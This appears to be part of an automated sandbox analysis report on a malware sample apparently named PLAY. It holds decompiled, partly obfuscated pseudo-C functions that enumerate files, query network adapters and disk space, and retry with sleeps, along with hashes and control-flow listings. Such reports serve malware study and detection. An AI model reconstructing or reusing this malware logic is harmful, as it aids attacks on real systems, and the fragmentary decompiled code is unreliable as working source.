										 *(_t389 - 0x29c) = _t325;
										 *((intOrPtr*)(_t389 - 0x2a0)) = _t170;
									} while (_t170 < ( *(_t389 - 0x28c))[0x18]);
									goto L44;
								}
							}
						} else {
							E00AEE110(_t245, _t355, _t355, _t369);
							return E00AF7B30( *(_t389 - 4) ^ _t389, _t259);
						}
					} else {
						E00AEE450(_t147, _t245);
						return E00AF7B30( *(_t389 - 4) ^ _t389);
					}
				} else {
					_t425 = _t396 - 0x10;
					if(0x79 <= 0x24) {
						_t425 = _t425 + 0x184;
					}
					_t426 = _t425 + 0x10;
					L4();
					if(0x44b05fc7 < 0) {
						 *_t146 =  *_t146 + _t146;
						 *_t146();
						return E00AF7B30( *(_t389 - 4) ^ _t389,  *((intOrPtr*)(_t389 - 0x260)));
					} else {
						 *_t426 =  *_t426 + 0x14;
						return _t146;
					}
				}
				L49:
			}

















































          0x00ae1cac
          0x00ae1cae
          0x00ae1cb2
          0x00ae1cb9
          0x00ae1cbb
          0x00ae1cc2
          0x00ae1cc3
          0x00ae1cc9
          0x00ae1cce
          0x00ae1cd4
          0x00ae1cdc
          0x00ae1ce0
          0x00ae1d39
          0x00ae1d44
          0x00ae1d49
          0x00ae1d4b
          0x00ae1d4e
          0x00ae1d56
          0x00ae1d73
          0x00ae1d7a
          0x00ae1d84
          0x00ae1d85
          0x00ae1d8a
          0x00ae1d8f
          0x00ae1d92
          0x00ae1d94
          0x00ae1d96
          0x00ae1d9d
          0x00ae1dbe
          0x00ae1dcc
          0x00ae1dce
          0x00ae1dd5
          0x00ae1de6
          0x00ae2434
          0x00ae2451
          0x00ae1dec
          0x00ae1dec
          0x00000000
          0x00ae1dec
          0x00ae1dd7
          0x00ae1dd7
          0x00ae1df1
          0x00ae1e01
          0x00ae1e04
          0x00ae1e14
          0x00ae1e17
          0x00ae1e1d
          0x00ae1e26
          0x00ae1e29
          0x00ae1e33
          0x00ae1e36
          0x00ae1e40
          0x00ae1e46
          0x00ae2372
          0x00ae2375
          0x00ae2392
          0x00ae1e50
          0x00ae1e50
          0x00ae1e58
          0x00ae1e79
          0x00ae1e7c
          0x00ae1e82
          0x00ae1e88
          0x00ae1e91
          0x00ae1e99
          0x00ae1e9f
          0x00ae1ea1
          0x00ae1ea9
          0x00000000
          0x00ae1eaf
          0x00ae1eaf
          0x00ae1eb4
          0x00ae1ebf
          0x00ae1ec5
          0x00ae1eca
          0x00ae1ecf
          0x00000000
          0x00ae1ed5
          0x00ae1ed5
          0x00ae1edb
          0x00ae1edd
          0x00ae1ee3
          0x00ae1ee7
          0x00ae1efe
          0x00ae1ee9
          0x00ae1ef9
          0x00ae1ef9
          0x00ae1f07
          0x00ae1f0b
          0x00ae1f0c
          0x00ae1f17
          0x00ae1f21
          0x00ae1f25
          0x00ae1f33
          0x00ae1f36
          0x00ae1f3b
          0x00ae1f3f
          0x00ae1f42
          0x00ae1f47
          0x00ae1f4d
          0x00ae1f53
          0x00ae1f5c
          0x00ae1f6b
          0x00ae1f6f
          0x00ae1f71
          0x00ae1f79
          0x00ae1f8c
          0x00ae1f8e
          0x00ae1fad
          0x00ae1fb3
          0x00ae1fb5
          0x00ae1fc2
          0x00ae1fc4
          0x00ae1fcc
          0x00ae1fe3
          0x00ae1fe5
          0x00ae1feb
          0x00ae1ffc
          0x00ae1ffe
          0x00ae2003
          0x00ae2006
          0x00ae200c
          0x00ae200c
          0x00ae1f5c
          0x00ae2014
          0x00ae201b
          0x00ae201f
          0x00ae202c
          0x00ae2030
          0x00ae203e
          0x00ae2041
          0x00ae2046
          0x00ae204d
          0x00ae2050
          0x00ae2056
          0x00ae210b
          0x00ae22b1
          0x00ae22b1
          0x00000000
          0x00ae2111
          0x00ae2117
          0x00ae211d
          0x00ae2120
          0x00ae2120
          0x00ae212d
          0x00ae212e
          0x00ae2133
          0x00ae2138
          0x00000000
          0x00000000
          0x00ae213a
          0x00ae2140
          0x00ae2144
          0x00000000
          0x00ae2146
          0x00ae2151
          0x00ae2151
          0x00ae2158
          0x00ae215a
          0x00ae215a
          0x00ae2160
          0x00ae2163
          0x00ae2168
          0x00ae2171
          0x00ae2173
          0x00ae2176
          0x00ae2178
          0x00ae2178
          0x00ae217a
          0x00ae217e
          0x00ae217f
          0x00ae217f
          0x00000000
          0x00ae2144
          0x00ae214b
          0x00ae2393
          0x00ae2399
          0x00ae22ab
          0x00000000
          0x00ae239f
          0x00ae23a7
          0x00ae23a8
          0x00ae23ad
          0x00ae23bc
          0x00ae23c5
          0x00ae23ce
          0x00ae23d0
          0x00ae23d6
          0x00ae23de
          0x00ae23e7
          0x00ae23e9
          0x00ae23ee
          0x00ae23ee
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x00ae214b
          0x00ae205c
          0x00ae206b
          0x00ae206d
          0x00ae206f
          0x00ae2077
          0x00ae208a
          0x00ae208c
          0x00ae20ab
          0x00ae20b1
          0x00ae20b3
          0x00ae20c0
          0x00ae20c2
          0x00ae20ca
          0x00ae20e1
          0x00ae20e3
          0x00ae20e9
          0x00ae20fa
          0x00ae20fc
          0x00ae2101
          0x00ae22b7
          0x00ae22b9
          0x00000000
          0x00ae22bb
          0x00ae22bb
          0x00ae22c1
          0x00ae22c9
          0x00ae2413
          0x00ae2430
          0x00ae22cf
          0x00ae22e9
          0x00ae230f
          0x00ae231a
          0x00ae2320
          0x00ae232d
          0x00ae2330
          0x00000000
          0x00ae2330
          0x00ae22c9
          0x00ae22b9
          0x00ae2056
          0x00000000
          0x00000000
          0x00000000
          0x00ae1eb4
          0x00000000
          0x00ae2332
          0x00ae2338
          0x00ae233e
          0x00ae234b
          0x00ae234e
          0x00ae2354
          0x00ae2357
          0x00ae235d
          0x00ae2363
          0x00ae2369
          0x00000000
          0x00ae1e50
          0x00ae1e46
          0x00ae1d9f
          0x00ae1da2
          0x00ae1dbd
          0x00ae1dbd
          0x00ae1d58
          0x00ae1d5a
          0x00ae1d72
          0x00ae1d72
          0x00ae1ce2
          0x00ae1ce2
          0x00ae1ceb
          0x00ae1ced
          0x00ae1ced
          0x00ae1cf3
          0x00ae1cf6
          0x00ae1cfc
          0x00ae1d18
          0x00ae1d21
          0x00ae1d38
          0x00ae1cfe
          0x00ae1cfe
          0x00ae1d02
          0x00ae1d02
          0x00ae1cfc
          0x00000000

          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: e69c304630cf98b98096a1596e7a3f8bc75d77a3ed4c025c59e8d7f8f33ee7ee
          • Instruction ID: cca69aa31dec9e88c40768aceb78f2f6ac1e6e38c0a6ec58f440ef3050a5e872
          • Opcode Fuzzy Hash: e69c304630cf98b98096a1596e7a3f8bc75d77a3ed4c025c59e8d7f8f33ee7ee
          • Instruction Fuzzy Hash: F402F571E002698BDF20DF69DD857EDB3B1EF54304F1046A9E90D6B285EB31AE85CB81
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AF51D0 Relevance: 1.7, Strings: 1, Instructions: 439COMMON
          Download Yara Rule
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID:
          • String ID: vHRfakF
          • API String ID: 0-4259475908
          • Opcode ID: 19d191b54f363e3d44eb331b85452025a14ed685a4fa47817e62cc041000a4a0
          • Instruction ID: 096dd71cfa1a1de17ff8d97f771f224d2a826f52d6ad057af58d1722e324d649
          • Opcode Fuzzy Hash: 19d191b54f363e3d44eb331b85452025a14ed685a4fa47817e62cc041000a4a0
          • Instruction Fuzzy Hash: 3E02F471E042598BDB20DBB8DC417EDBBB1EF59314F1442A9E949A7382EB305AC4CF50
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AEB625 Relevance: 1.7, APIs: 1, Instructions: 186fileCOMMON
          Download Yara Rule
          APIs
          • FindFirstFileW.KERNELBASE(?,?,5FB96430), ref: 00AEB660
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: FileFindFirst
          • String ID:
          • API String ID: 1974802433-0
          • Opcode ID: e0576a0e367eb0ca4cfac0b31f57dfbfa282cf0f1ac652fd09aa3bead9ebb976
          • Instruction ID: 051943983003d8b605155b1117990acae62346481e1121eeb2f4a77119e46f26
          • Opcode Fuzzy Hash: e0576a0e367eb0ca4cfac0b31f57dfbfa282cf0f1ac652fd09aa3bead9ebb976
          • Instruction Fuzzy Hash: F171E171C202A98BDB26AB65C9517FEB3B9EF64304F0442E9D809A7285E7314F85CF61
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AF1B89 Relevance: 1.6, APIs: 1, Instructions: 127COMMON
          Download Yara Rule
          C-Code - Quality: 33%
          			E00AF1B89(void* __eax, signed char __edx, intOrPtr __edi, void* __eflags, void* __fp0) {
				intOrPtr* _t76;
				void* _t77;
				char _t79;
				void* _t83;
				signed char _t91;
				void* _t93;
				signed char _t94;
				signed char _t96;
				intOrPtr _t100;
				signed char _t101;
				signed int _t107;
				signed char _t116;
				signed int _t119;
				void* _t129;
				void* _t130;
				void* _t131;
				void* _t132;
				void* _t134;
				signed char* _t135;
				signed int _t139;

				_t124 = __edi;
				_t116 = __edx;
				asm("adc edi, eax");
				asm("fsubr qword [ebx+0x6225c42e]");
				asm("out 0xde, eax");
				asm("out dx, eax");
				asm("out dx, eax");
				asm("fimul dword [edi]");
				asm("repne std");
				_pop(_t93);
				asm("out 0x2d, al");
				_pop(0);
				asm("out 0x6e, al");
				_t100 =  *0xb0d6d8; // 0xc1dad6a7
				_t76 = E00AEDEC0(_t93, _t100, __edi, 0);
				_t94 =  *(_t129 - 0x50);
				_t101 = _t129 - 0x10;
				_t77 =  *_t76(_t94, _t101, __edx); // executed
				if(_t77 == 0) {
					_t116 =  *((intOrPtr*)(_t129 - 0x58));
					_t124 =  *((intOrPtr*)(_t129 - 0xe4));
					 *((short*)(_t129 - 0x1a)) =  *((intOrPtr*)(_t129 - 0xc2));
					 *(_t129 - 0x38) =  *(_t129 - 0x9c) & 0x0000ffff;
					 *((short*)(_t129 - 0x1e)) =  *((intOrPtr*)(_t129 - 0x9e));
					 *((char*)(_t129 - 0x18)) =  *((intOrPtr*)(_t129 - 0x87));
					_t79 =  *((intOrPtr*)(_t129 - 0x5c));
					 *((short*)(_t129 - 0x2e)) =  *((intOrPtr*)(_t129 - 0xa0));
					 *(_t129 - 0x17) = _t116;
					 *((char*)(_t129 - 0x15)) = _t79;
					 *((short*)(_t129 - 0x1c)) =  *((intOrPtr*)(_t129 - 0xd8));
					asm("o16 nop [eax+eax]");
					while(1) {
						_t101 = _t94 + 0x1ac;
						_t96 = (_t116 & 0x000000ff) *  *(_t129 - 0x24);
						 *(_t129 - 0x34) = _t101;
						__eflags = _t101;
						if(_t101 == 0) {
							goto L13;
						} else {
							goto L4;
						}
						do {
							L4:
							 *((char*)(_t129 - 0x15)) = _t79 + 0xfd;
							 *((char*)(_t129 - 0x16)) = _t116 + 0xdc;
							 *(_t129 - 0x14) = E00AEF3F0(_t96, _t101 + 4, _t124, 0);
							_t91 = E00AEF3F0(_t96,  *(_t129 - 0x34) + 0x14, _t124, 0);
							 *(_t129 - 0xc) = _t91;
							 *((intOrPtr*)(_t129 - 0x2e)) =  *((intOrPtr*)(_t129 - 0x2e)) + 0xffff;
							 *(_t129 - 0x38) =  *(_t129 - 0x38) + 0xffff;
							__eflags =  *(_t129 - 0x14);
							if( *(_t129 - 0x14) == 0) {
								goto L10;
							} else {
								__eflags = _t91;
								if(_t91 == 0) {
									goto L10;
								} else {
									_t134 = _t130 - 4;
									__eflags = 0x63 - 0x15;
									if(0x63 <= 0x15) {
										_t134 = _t134 + 0x35;
									}
									_t135 = _t134 + 4;
									L9();
									 *0xFFFFFFFFFFFFFFF2 =  *0xFFFFFFFFFFFFFFF2 ^ (_t96 | 0x00000063);
									_pop(ds);
									asm("xlatb");
									asm("enter 0xc6b, 0xd");
									 *[ss:esi] =  *[ss:esi] & 0x00000083;
									__eflags =  *[ss:esi];
									 *_t135 =  *_t135 + 0x44;
									__eflags =  *_t135;
									return _t91;
								}
							}
							goto L34;
							L10:
							_t116 =  *((intOrPtr*)(_t129 - 0x16));
							 *((intOrPtr*)(_t129 - 0x1c)) =  *((intOrPtr*)(_t129 - 0x1c)) + 0xffff;
							 *(_t129 - 0x24) =  *(_t129 - 0x24) - 1;
							_t124 = _t124 + 1;
							_t79 =  *((intOrPtr*)(_t129 - 0x15));
							 *((char*)(_t129 - 0x18)) =  *((intOrPtr*)(_t129 - 0x4c)) - _t96;
							_t101 =  *( *(_t129 - 0x34));
							 *(_t129 - 0x34) = _t101;
							__eflags = _t101;
						} while (_t101 != 0);
						_t116 =  *(_t129 - 0x17);
						L13:
						_t94 =  *( *(_t129 - 0x50));
						 *(_t129 - 0x50) = _t94;
						 *((short*)(_t129 - 0x11e)) =  *(_t129 - 0x24) * 0;
						 *((intOrPtr*)(_t129 - 0x1e)) =  *((intOrPtr*)(_t129 - 0x1e)) + 0xffff;
						__eflags = _t94;
						if(__eflags == 0) {
							goto L15;
						} else {
							_t79 =  *((intOrPtr*)(_t129 - 0x15));
							continue;
						}
						goto L34;
					}
				} else {
					 *((intOrPtr*)(_t129 - 0x54)) = 0xfffffffc;
					L15:
					_t131 = _t130 - 0xc;
					_t83 = 0x25;
					if(0x25 == 0x51) {
						_t131 = _t131 + 0x113;
					}
					_t132 = _t131 + 0xc;
					L23();
					_t139 =  *[es:edi+0x70c1e5fd] & 0;
					while(1) {
						asm("std");
						asm("in eax, 0xc1");
						if(_t139 < 0) {
							break;
						}
						asm("lodsb");
						_t119 = _t116 -  *((intOrPtr*)(_t101 + 0x28a8c382));
						_t107 = _t119 * 0xbd5459ca;
						asm("invalid");
						asm("sbb [ebp+0x79], esp");
						asm("out 0xf, eax");
					}
				}
				L34:
			}























          0x00af1b89
          0x00af1b89
          0x00af1b8e
          0x00af1b90
          0x00af1b96
          0x00af1b98
          0x00af1b99
          0x00af1b9a
          0x00af1ba3
          0x00af1ba5
          0x00af1ba6
          0x00af1ba8
          0x00af1baa
          0x00af1bae
          0x00af1bb4
          0x00af1bb9
          0x00af1bbc
          0x00af1bc1
          0x00af1bc5
          0x00af1be5
          0x00af1be8
          0x00af1bef
          0x00af1bfa
          0x00af1c04
          0x00af1c0f
          0x00af1c12
          0x00af1c15
          0x00af1c20
          0x00af1c23
          0x00af1c26
          0x00af1c2a
          0x00af1c30
          0x00af1c30
          0x00af1c39
          0x00af1c3d
          0x00af1c40
          0x00af1c42
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x00af1c48
          0x00af1c48
          0x00af1c50
          0x00af1c53
          0x00af1c61
          0x00af1c64
          0x00af1c6e
          0x00af1c71
          0x00af1c75
          0x00af1c79
          0x00af1c7d
          0x00000000
          0x00af1c83
          0x00af1c83
          0x00af1c85
          0x00000000
          0x00af1c8b
          0x00af1c8b
          0x00af1c90
          0x00af1c93
          0x00af1c95
          0x00af1c95
          0x00af1c98
          0x00af1c9b
          0x00af1ca3
          0x00af1ca6
          0x00af1ca7
          0x00af1ca8
          0x00af1cac
          0x00af1cac
          0x00af1caf
          0x00af1caf
          0x00af1cb3
          0x00af1cb3
          0x00af1c85
          0x00000000
          0x00af1f82
          0x00af1f82
          0x00af1f8d
          0x00af1f93
          0x00af1f96
          0x00af1f98
          0x00af1f9b
          0x00af1fa1
          0x00af1fa3
          0x00af1fa6
          0x00af1fa6
          0x00af1fae
          0x00af1fb1
          0x00af1fba
          0x00af1fbc
          0x00af1fbf
          0x00af1fcb
          0x00af1fcf
          0x00af1fd1
          0x00000000
          0x00af1fd3
          0x00af1fd3
          0x00000000
          0x00af1fd3
          0x00000000
          0x00af1fd1
          0x00af1bc7
          0x00af1bc7
          0x00af1fe2
          0x00af1fe2
          0x00af1fe5
          0x00af1fe9
          0x00af1feb
          0x00af1feb
          0x00af1ff1
          0x00af1ff4
          0x00af1ff9
          0x00af1ffc
          0x00af1ffc
          0x00af1ffd
          0x00af1fff
          0x00000000
          0x00000000
          0x00af2001
          0x00af2002
          0x00af2009
          0x00af200f
          0x00af2010
          0x00af2014
          0x00af2014
          0x00af206c
          0x00000000

          APIs
          • GetAdaptersInfo.IPHLPAPI(?,?), ref: 00AF1BC1
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: AdaptersInfo
          • String ID:
          • API String ID: 3177971545-0
          • Opcode ID: dae7199a6def9b05b76432990f9b75328ad116f656bf09421e87e6e3dfe034e6
          • Instruction ID: 54947f51b2467be390f8f6373bd7f132d7b194e912c39f010ea64bbc13ebfb23
          • Opcode Fuzzy Hash: dae7199a6def9b05b76432990f9b75328ad116f656bf09421e87e6e3dfe034e6
          • Instruction Fuzzy Hash: 3E51D175D0428ECACF14DFF4D9912FEBBB1EF29310F1450AAE8516B382E2304A45CBA1
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AF1A7D Relevance: 1.5, APIs: 1, Instructions: 47COMMON
          Download Yara Rule
          APIs
          • GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 00AF1AB3
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: AdaptersInfo
          • String ID:
          • API String ID: 3177971545-0
          • Opcode ID: 0edf1c41617cf7d279951ce8ca7b436dff0514416b662cfbc386c3802ccd7bee
          • Instruction ID: 2f069b265569ddb9c7396e76d7dc085ae4affc35059762b1d21e3946eed2d76b
          • Opcode Fuzzy Hash: 0edf1c41617cf7d279951ce8ca7b436dff0514416b662cfbc386c3802ccd7bee
          • Instruction Fuzzy Hash: 54017B72E0011987CB44FBF5EC467A9B3A6AF58350F00216FF825861C5FA2259009B90
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AEA224 Relevance: 1.5, APIs: 1, Instructions: 34COMMON
          Download Yara Rule
          C-Code - Quality: 79%
          			E00AEA224(void* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				int _t13;
				signed int _t36;

				E00AEDEC0(__ebx, __ecx, __edi, __esi);
				_t13 = GetDiskFreeSpaceExW( *(_t36 - 0x24), _t36 - 0x20, _t36 - 0x18, _t36 - 0x10); // executed
				if(_t13 != 0) {
					return E00AF7B30( *(_t36 - 4) ^ _t36);
				} else {
					return E00AF7B30( *(_t36 - 4) ^ _t36);
				}
			}





          0x00aea22e
          0x00aea242
          0x00aea246
          0x00aea271
          0x00aea248
          0x00aea25a
          0x00aea25a

          APIs
          • GetDiskFreeSpaceExW.KERNELBASE(?,?,?,?), ref: 00AEA242
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: DiskFreeSpace
          • String ID:
          • API String ID: 1705453755-0
          • Opcode ID: 729fde6f916baa7be37ce84510481b057812d8777cd56ff916d744db62ff7021
          • Instruction ID: 38fbee8dbde691e5dbca93a3a0848259044de987ca21f58028c0722901803ab4
          • Opcode Fuzzy Hash: 729fde6f916baa7be37ce84510481b057812d8777cd56ff916d744db62ff7021
          • Instruction Fuzzy Hash: BFF03733B1400D9B9F08DBE5E9629FFB3B5EFD8311B54026EE60BA2540DE326D0587A1
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AF83F1 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
          Download Yara Rule
          C-Code - Quality: 100%
          			E00AF83F1() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00AF83FD); // executed
				return _t1;
			}




          0x00af83f6
          0x00af83fc

          APIs
          • SetUnhandledExceptionFilter.KERNELBASE(Function_000183FD,00AF7D1A), ref: 00AF83F6
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: ExceptionFilterUnhandled
          • String ID:
          • API String ID: 3192549508-0
          • Opcode ID: 12e6c9c4c1e1583c2a8c93ae69d1002a2ba0e86ca7bad59f0b4f91e0db0c58b2
          • Instruction ID: dadcb4d621d7bbd6c8f31423000077be28e584189c77895b167123187b3f6d91
          • Opcode Fuzzy Hash: 12e6c9c4c1e1583c2a8c93ae69d1002a2ba0e86ca7bad59f0b4f91e0db0c58b2
          • Instruction Fuzzy Hash:
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AE4A81 Relevance: .2, Instructions: 177COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: e894491bdcef0d4a10924540a3dc9fc5ae5375c7ea4971bebdd2f088c6e2f1b9
          • Instruction ID: f7f06e9f41bfced80bf16611791767d755a63d48427cc802409476c6193bdd5c
          • Opcode Fuzzy Hash: e894491bdcef0d4a10924540a3dc9fc5ae5375c7ea4971bebdd2f088c6e2f1b9
          • Instruction Fuzzy Hash: 3C510932B0014C5BDF04DFA9ED52BBDB366DF89325F104369F91A9B1D2EA218D158780
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AF31F0 Relevance: 9.3, APIs: 2, Strings: 4, Instructions: 279COMMON
          Download Yara Rule

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 864 af31f0-af31f1 865 af31f3-af3211 864->865 866 af3216-af321e call af322f 865->866 867 af3213 865->867 866->865 870 af3220-af322b 866->870 867->866 871 af322d-af3290 870->871 872 af3294-af3301 call af36b0 870->872 871->872 875 af3307-af3352 872->875 876 af36a0 872->876 877 af3355-af3358 875->877 878 af335e-af3367 877->878 879 af343d-af3484 call aee4a0 877->879 881 af336f-af337c call af33a8 878->881 882 af3369 878->882 885 af3486-af348f GetLastError 879->885 886 af34a4-af34bf 879->886 890 af337e-af33a2 881->890 891 af33cb-af33f2 881->891 882->881 885->886 888 af3491-af34a1 Sleep 885->888 886->877 889 af34c5-af34d1 886->889 888->886 892 af34d9-af34e6 call af3512 889->892 893 af34d3 889->893 890->891 894 af33f4-af33fd 891->894 895 af3431-af343a 891->895 901 af34e8-af350c 892->901 902 af3535-af3537 892->902 893->892 896 af33ff 894->896 897 af3405-af3414 call af3410 894->897 895->879 896->897 901->902 904 af359c-af35a7 902->904 905 af3539 902->905 908 af35ad-af35c8 call aee4a0 904->908 909 af368a-af369f call af7b30 904->909 907 af3540-af354a 905->907 910 af354c-af3555 907->910 911 af3590-af359a 907->911 917 af35cd-af35d8 908->917 914 af355d-af356c call af3568 910->914 915 af3557 910->915 911->904 911->907 915->914 917->909 918 af35de-af35ed 917->918 920 af35ef 918->920 921 af35f5-af35fe call af361b 918->921 920->921 926 af3611-af361a 921->926 927 af3600 921->927 926->909
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID:
          • String ID: :$KNNZ$PYrGv9k$a
          • API String ID: 0-2185861156
          • Opcode ID: 9355e83e5045a37c2765297a1b5e8008f0c7d1de758b3e0b882b49a458786ff2
          • Instruction ID: eef121781172771adaafb8b9a01de8ca15c4a371b256980ed093cecfecc8522e
          • Opcode Fuzzy Hash: 9355e83e5045a37c2765297a1b5e8008f0c7d1de758b3e0b882b49a458786ff2
          • Instruction Fuzzy Hash: 5FB1C076C0428D8FCF11DFA8D9416EDBBB0EF69310F1852AAE954A7352EB314B44CB51
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AF3722 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 237sleepCOMMON
          Download Yara Rule

          Control-flow Graph

          • Executed
          • Not Executed
